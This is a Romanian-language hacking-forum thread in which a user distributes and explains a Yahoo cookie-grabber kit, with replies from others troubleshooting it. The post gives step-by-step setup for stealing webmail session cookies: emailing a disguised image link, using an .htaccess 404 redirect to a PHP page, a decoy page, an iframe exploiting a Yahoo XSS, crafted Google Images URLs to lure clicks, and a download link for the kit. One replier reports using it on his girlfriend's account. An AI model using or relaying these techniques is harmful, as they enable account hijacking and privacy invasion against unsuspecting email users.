Yah00 Cookie grabber bazat pe redirect 404

[loki]

Acesta este o adaptare a cookie grabber-ului facut de echipa RST. (sa nu fie cu suparare ca am inclus 80% sursele grabberului vechi. Am lasat creditele in comments)

Este un tutorial in scop educativ.

Nu incurajeaza frauda, nu-mi asum nici o responsabilitate pentru utilizarea acestui tutorial in alte scopuri.

Cel mai important este sa invatati sa va feriti de link-uri primite pe email chiar daca apar total inofensive.

download: http://rapidshare.com/files/123535272/prajituri.zip.html

Prezinta o metoda diferita de cookie stealing: bazata pe accesarea unei pagini inexistente.

Prezinta avantajul unei ascundere a xss-ului si a intentiei prin trimiterea unui link aparent inofensiv: o fotografie

Functionare:

- Se trimite un mail victimei continand printre altele un link, de exemplu:

http://atacatorul.com/prajituri/eu_sexiii.jpg

- Pe serverul atacatorul.com NU exista eu_sexiii.jpg deci se genereaza o eroare 404 Page Not Found

- Aici intervine .htaccess care contine tratarea erorii 404 prin redirectarea spre main.php

- Pe tot parcursul operatiilor in address bar ramane acelasi link: eu_sexiii.jpg

- main.php include o pagina de momeala (am luat de la google) dar puteti baga un "Connection Time Out"

- de asemenea intr-un iframe se executa redirect-urile necesare printr-un XSS yahoo

- index.php accesat in iframe va salva cookie-urile in folderul grabbed (in fisiere separate). Nu trimite mail, puteti adauga rutina daca aveti mail pe server.

- fisierul momeala.jpg va fi copiat sub numele paginii accesate initial

- userul va accesa eventual a doua oara link-ul si ii va aparea corect "eu_sexiii.jpg" (de aceasta data fisierul exista, grabberul nu mai este accesat)

Instalare:

- copiati folder-ul prajituri (un nume aparent dragut).

- toate link-urile le veti trimite pe email cu adresa http://atacatorul.com/prajituri/ceva.jpg deoarece redirect-ul 404 va functiona doar in acel folder, "prajituri".

- daca schimbati numele folderului editati .htaccess cu numele noului folder

- robots.txt are scopul de a opri roboteii google

Setari:

main.php

- $shortlog = numele fisierului cu IP-uri (in caz ca nu ati furat cookies aveti bucuria unui IP). Daca e mare il deschideti frumos cu excell si dati autoarange.

- $momeala = fotografia care va inlocui link-ul trimis pe email dupa culesul cookieului

- $included = puneti un link la o pagina cu eroare preferabil un timeout sa nu bata la ochi;

index.php = numele e intentionat, accesand folderul va fi accesat automat index-ul. Scriu si mai pe scurt <iframe="./">. Daca schimbati numele automat schimbati si link-ul din iframe.

- $xss = un xss yahoo, daca e unul mai simplu scrieti doar adresa pana la variabila afectata. Am inclus unul, iar mai jos apare formula de redirect

- $cookiefolder = folderul unde va salva sub forma html paginile continand cookie-urile.

Nu este nevoie sa adaugati numele site-ului la redirect, si-l ia singur.

Va rog sa semnalati orice erori constatate.

Lokipaki

ERATA

- in index.php $cookefolder="./grabbed/"; a se inlocui cu $cookiefolder="./grabbed/"; am mancat o litera

- in citeste-ma.txt in loc de grabber.php este index.php

nu mai fac reupload pentru asta

[loki]

Acum hai sa-l facem mai picant

Testati cu astea, apoi trimiteti pe email linkuri de genul (fara localhost):

http:// images.google.ro/imgres?imgurl=http://localhost/prajituri/scrie%2Bmai%2Bjos%2BMega%2Bdiscoteca%2BTineretului.JPG&imgrefurl=http://galerie.dyn.ro/harby/vara2006/mare/scrie%2Bmai%2Bjos%2BMega%2Bdiscoteca%2BTineretului.JPG.html&h=480&w=640&sz=41&hl=ro&start=3&tbnid=lMIGwH51Gnb3AM:&tbnh=103&tbnw=137&prev=/images%3Fq%3Ddiscoteca%26gbv%3D2%26hl%3Dro%26sa%3DG

Cine mananca google pe paine nu se abtine sa dea click pe aia mica de sus

Mai sadic: se executa in frame-ul google (aici mergea o pagina de la google cu not found ceva)

http:// images.google.ro/imgres?imgurl=http://localhost/prajituri/scrie%2Bmai%2Bjos%2BMega%2Bdiscoteca%2BTineretului.JPG&imgrefurl=http://localhost/prajituri/scrie%2Bmai%2Bjos%2BMega%2Bdiscoteca%2BTineretului.JPG.html&h=480&w=640&sz=41&hl=ro&start=3&tbnid=lMIGwH51Gnb3AM:&tbnh=103&tbnw=137&prev=/images%3Fq%3Ddiscoteca%26gbv%3D2%26hl%3Dro%26sa%3DG

In cazul 2 fisierul de momeala va fi un html care probabil va contine un redirect

[HunterxD]

cool. thanks

[edededi]

eu nu pot sa uploadez .htaccess imi da urmatoarea eroare

MDTM .htaccess

550 .htaccess: No such file or directory

Edit : acum merge am uploadat un fisier txt am scris in el ce scria si in .htaccess si dupa aceea am modificat numele .htaccess

[edededi]

scuzati pentru dublu post , dar nu pot sa-l editez pe cel de sus , in ftp manager imi arata ca am uploadat .htaccess dar daca intru de pe din ftp-ul de pe site nu-l vad , am incercat sa vad daca macar isi face efectul , si nu si-l face , adica cand intru pe link imi da eroarea 404

[loki]

are . in fata stiu ca e mai greu

foloseste un windows commander sau total commander, nu stiu daca merge cu ftp din windows. Refresh sa vezi daca e acolo

[Hellbound]

am facut exact cum ai zis in tutorial si nu merge ... trebuie sa fac ceva sa mearga ?

[TheBes7]

Cred c? am ?nt?mpinat ?i eu o problem?.

Deci am l?sat totul cum era ?i ?n download, am editat acolo la cookefolder, am pus I-ul, bun perfect.

Urc pe host/domeniu ( mistocar.com - sper c? nu se consider? reclama - e GOL ).

Adev?rul este c? nu am trimis eMail, i-am dat unui mai prost link-ul respectiv, domeniu.com/prajituri/eu_sexii.jpg , a zis ca i-a dat eroare ( deci este bine ) dar nu mi-a aparut nimic in grabbed.

Am gre?it ceva?

Mul?umesc!

EDIT : Va rog stergeti acesta, era scris cu diacritice si nu apar!

[TheBes7]

Cred ca am intampinat si eu o problema.

Deci am lasat totul cum era si ?n download, am editat acolo la cookefolder, am pus I-ul, bun perfect.

Urc pe host/domeniu ( mistocar.com - sper ca nu se considera reclama - e GOL ).

Adevarul este ca nu am trimis eMail, iam dat unui mai prost link-ul respectiv, domeniu.com/prajituri/eu_sexii.jpg , a zis ca i-a dat eroare ( deci este bine ) dar nu mi-a aparut nimic in grabbed.

Am gresit ceva?

Multumesc!

[dan_wtf]

Cred ca am intampinat si eu o problema.

Deci am lasat totul cum era si ?n download, am editat acolo la cookefolder, am pus I-ul, bun perfect.

Urc pe host/domeniu ( mistocar.com - sper ca nu se considera reclama - e GOL ).

Adevarul este ca nu am trimis eMail, iam dat unui mai prost link-ul respectiv, domeniu.com/prajituri/eu_sexii.jpg , a zis ca i-a dat eroare ( deci este bine ) dar nu mi-a aparut nimic in grabbed.

Am gresit ceva?

Multumesc!

pai trebuie accesat linku din mail ptr ca e un xss yahoo ... nu are ce cookie sa inregistreze daca intra direct pe link as zice eu ....

[HunterxD]

merge daca a fost logat anterior pe mail

[Hellbound]

face cineva un tutorial video pentru a intelege toti ?

[Caracal]

ha! tocmai vroiam sa te iau la zor ca nu imi merge si sa te stresez cu intrebari ma tot uitam prin folderul grabbed si nu era nimic. apoi am vazut ca a aparut un fisier <id>.html si e acolo tot ce`mi trebuie foarte tare. bravo

Later Edit:

uite ca frectie! acu mi`a aparut:

Warning: include() [function.include]: URL file-access is disabled in the server configuration in .../prajituri/main.php on line 12

Warning: include(http://www.google.com/tisp/notfound.html) [function.include]: failed to open stream: no suitable wrapper could be found in .../prajituri/main.php on line 12

Warning: include() [function.include]: Failed opening 'http://www.google.com/tisp/notfound.html' for inclusion (include_path='.:/usr/local/php5/lib/php:/usr/local/lib/php') in .../prajituri/main.php on line 12

e de la serveru pe care am pus grabberu, nu?

si merge doar pe firefox, ie..sau cum? eu i`am dat pe mail linku prietenei care intra cu internet explorer. i`a aparut poza dar nu aparuse nimic nou. am intrat eu pe mailu ei cu firefoxu si am dat intrat apoi pe link. mi`a aparut poza si a aparut si <id>.html pe server. sub id`u ei, era ip`u meu, deci de la mine a mers. am incercat iar si i`a aparut tampenia de mai sus. am incercat si eu si la fel a aparut

[edededi]

ha! tocmai vroiam sa te iau la zor ca nu imi merge si sa te stresez cu intrebari ma tot uitam prin folderul grabbed si nu era nimic. apoi am vazut ca a aparut un fisier <id>.html si e acolo tot ce`mi trebuie foarte tare. bravo

Later Edit:

uite ca frectie! acu mi`a aparut:

Warning: include() [function.include]: URL file-access is disabled in the server configuration in .../prajituri/main.php on line 12

Warning: include(http://www.google.com/tisp/notfound.html) [function.include]: failed to open stream: no suitable wrapper could be found in .../prajituri/main.php on line 12

Warning: include() [function.include]: Failed opening 'http://www.google.com/tisp/notfound.html' for inclusion (include_path='.:/usr/local/php5/lib/php:/usr/local/lib/php') in .../prajituri/main.php on line 12

e de la serveru pe care am pus grabberu, nu?

si merge doar pe firefox, ie..sau cum? eu i`am dat pe mail linku prietenei care intra cu internet explorer. i`a aparut poza dar nu aparuse nimic nou. am intrat eu pe mailu ei cu firefoxu si am dat intrat apoi pe link. mi`a aparut poza si a aparut si <id>.html pe server. sub id`u ei, era ip`u meu, deci de la mine a mers. am incercat iar si i`a aparut tampenia de mai sus. am incercat si eu si la fel a aparut

Tu cum ai uploadat .htacces?

[loki]

face cineva un tutorial video pentru a intelege toti ?

E inutil tutorial video care iti arata doar sa copii un folder pe ftp. Totul e presetat.

Erori apar insa din diverse motive.

- daca nu merge include, salvati o pagina cu eroare, orice, o pagina ca sa ii apara userului prima data. Si dati include "pagina.htm" daca e locala sau inclulde "http://site.com/pagina.htm" daca e din alta parte. Nu orice pagina se poate include.

- cred ca in functie de hosturi apar si restrictii la copierea .htaccess sau la scrierea fisierelor pe disc.

- Puteti adauga din grabberul RST bucatica de cod care trimite mail, am lasat intacte numele variabilelor deci ar merge.

[Caracal]

Tu cum ai uploadat .htacces?

adica? cu windows commander CTRL+F si iti apar optiuni ca sa si salvezi adresa ftp cu user si pass. sau CTRL+N sa scrii direct adresa si iti cere pe parcurs user si pass (debifezi annonymous plm)

si cum sa fac sa poata da victima click pe linku ala, nu copy-paste l`am trimis si sub forma www.site.com si sub forma http://www.site.com. tot copy-paste trebuie vreau sa dea click pe el daca intelegeti ce vreau sa zic..

[mario23]

prea adevarata metoda asta,pentru cei care nu pot sa uploadeze .htaccess sa il redenumeasca inainte sa-l urce pe server si acolo il redenumeste la loc, in cazul in care nu se poate sa caute alt host deoarece serverul are restrictii

[Hellbound]

faceti fratilor un tutorial video si va intelege tot da nu numai umploadare FTP si modificarile si totu pana cand apare in folderul grabber toate indicile ok ? si e mult mai bine

[loki]

un tutorial video cu ce?

Scenariu:

- scena 1: instalare windows commander

- scena 2: apasare tasta F5

(Sau windows: start-run-cmd-ftp-o-site-user-parola-md prajituri-cd-prajituri-cp....blabla ca n-am rabdare)

Zi-mi ca fac un video cu asta.

Chiar tre sa repet ca am muncit o zi intreaga ca sa mearga din prima sa copii un amarat de folder pe un host? si daca nu merge inseamna ca depinde de host, de diverse erori la care nu m-am gandit si probabil n-o sa imi vina in cap niciodata pana ma lovesc eu de ele?

[moubik]

daca faci tutorial video pentru chestia asta te consider noob-friendly :PP

[shinnok]

da da video ca nici eu nu am inteles cum draq copii un fisier de pe c: pe d:.

PS:Pentru ca am downloadat din greseala pe C: si imi treb pe D:.Cine poate sa ma ajute...Sa-mi dea adresa de mess.Mersi.

?

:PP

[loki]

[shinnok]

nu iti imaginezi cat de mult mai ajutat,dami idul tau sa mai vb pt ca vreau sa invat si cum sa tai un fisier si sa il lipesc in alta parte! Ti-as fi recunoscator.

Ms anticipat.

PS: Si daca tot mi-am adus aminte hai sa va arat si voua:

What is the newest version of linux nad give me direct link for download,cuz i am big h4x0r and i will use linux,give me link for download,but i want linux for hack,can linux hack for me one site?

sursa: http://r00tsecurity.org/forums/index.php?showtopic=3466

PS2: nu mai pot,sunt pe jos din nou )))))))))))))) :shock: :shock: It's like epic fail!!!

[loki]

protectie anti spam. incearca sa nu il trimiti de pe yahoo.

[MadaLin]

very nice work thx pt tutorial !